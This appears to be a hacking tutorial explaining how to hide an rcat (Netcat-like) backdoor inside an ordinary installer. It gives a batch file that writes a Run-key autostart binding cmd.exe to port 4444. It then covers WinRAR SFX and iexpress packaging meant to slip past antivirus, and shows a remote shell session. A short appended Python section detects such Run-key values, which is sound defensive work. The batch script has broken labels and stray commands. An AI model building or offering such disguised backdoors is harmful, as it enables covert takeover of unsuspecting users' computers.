As rcat is a good replica of Netcat and can bypass most antivirus software, why not wrap it up with another file (one that is not a backdoor)?
To do this we use a simple technique:
- Create a batch file that adds your Netcat to the system folder and edits the Windows registry. Wait, you don't need to create it, because I did it for you.
    copy rcat.exe %systemroot%\system32\rcat.exe
    if errorlevel 0 goto regedit
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\rcat.exe -L -d -p 4444 -t -e cmd.exe"
    if errorlevel 0 goto ip
    echo something wrong with the program.
    echo write down the IP address from the table
    nc -L -p 4444 -t
- Open Notepad and then save it as name.bat
- Download rcat and then copy rcat.exe into the same directory where name.bat exists
- Now we use WinRAR to combine these two files: select both, then right-click and choose Add to archive
- In the next window, check Create SFX archive
- Go to the Advanced tab and click SFX options
- Fill out the options as in the figure below
- Change to the Modes tab and select Hide all
- Almost done: click OK, then OK again to create the file
- The new file should appear in the same directory
- We have combined them, but now let's make it more compatible
- Click Start, then Run, and type iexpress
- The iexpress wizard will start. Click Next, then Next again (leave it as default), and where it asks for the package title, enter any title, like test
- In the next two windows leave the defaults, and then you need to add your files. You need to add two files like I did (see figure below): one must be the .exe file that we made using the method above, and the second can be any setup file. iexpress combines them into one.
- In the next window there are two options: for Install Program select the simple setup, and for Post Install Command select the backdoor.
- In the next window select Hidden, then click Next
- Enter the name of the final file and select the first option (see figure below)
- In the next window choose No restart, then Don't save, and on the last window create the package.
- Your new file should appear in the same directory, and here is the report.
- The new file can bypass the most famous antivirus software and it contains our backdoor.
    [email protected]:~# telnet 192.168.1.8 4444
    Connected to 192.168.1.8.
    Escape character is '^]'.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\Documents and Settings\Blacksheep>
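
Whatever the wrapper looks like to a file scanner, the batch file above still leaves a Run-key value whose command line binds cmd.exe to a port, and that is what a defender can check for. The following is an added example, not part of the original post: it parses `reg query` output for the Run key and flags such values. The sample output, the value names other than `nc`, and the function name `find_shell_listeners` are constructed for illustration.

```python
import re

# Constructed sample: output of
#   reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VendorTray    REG_SZ    "C:\Program Files\Vendor\tray.exe" -p default
    nc    REG_SZ    C:\WINDOWS\system32\rcat.exe -L -d -p 4444 -t -e cmd.exe
    Backup Agent    REG_EXPAND_SZ    %ProgramFiles%\Backup\agent.exe -l logfile.txt
"""

# A value line is: <indent><name><whitespace>REG_SZ|REG_EXPAND_SZ<whitespace><data>
VALUE_LINE = re.compile(
    r"^\s+(?P<name>.+?)\s+(?P<type>REG_(?:EXPAND_)?SZ)\s+(?P<data>.+)$")

# Standalone switches, as they appear in the command line on this page.
LISTEN = re.compile(r"(?<!\S)-l(?!\S)", re.I)
PORT = re.compile(r"(?<!\S)-p\s+(\d{1,5})(?!\S)", re.I)
EXEC_SHELL = re.compile(
    r"(?<!\S)-e\s+\"?(\S*\b(?:cmd|powershell)(?:\.exe)?)\"?(?!\S)", re.I)


def find_shell_listeners(reg_query_output):
    """Return (value_name, port, command) for autoruns that bind a shell to a port."""
    hits = []
    for line in reg_query_output.splitlines():
        m = VALUE_LINE.match(line)
        if not m:
            continue  # key header or blank line
        data = m.group("data").strip()
        shell = EXEC_SHELL.search(data)
        port = PORT.search(data)
        # "-l" or "-p" alone is common in benign tools; require "-e <shell>"
        # together with a listen switch or a numeric port.
        if shell and (LISTEN.search(data) or port):
            hits.append((m.group("name"),
                         int(port.group(1)) if port else None,
                         data))
    return hits


if __name__ == "__main__":
    for name, port, cmd in find_shell_listeners(SAMPLE_REG_QUERY):
        print(f"suspicious Run value {name!r} (port {port}): {cmd}")
```

The match is on the command line rather than the file name or hash, so it is unaffected by renaming the binary or repacking the installer.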